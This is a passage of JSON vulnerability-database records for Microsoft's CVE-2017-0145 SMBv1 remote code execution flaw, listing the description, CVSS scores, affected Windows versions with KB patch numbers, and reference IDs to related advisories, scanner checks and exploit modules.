Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB4014077", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4014077", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, 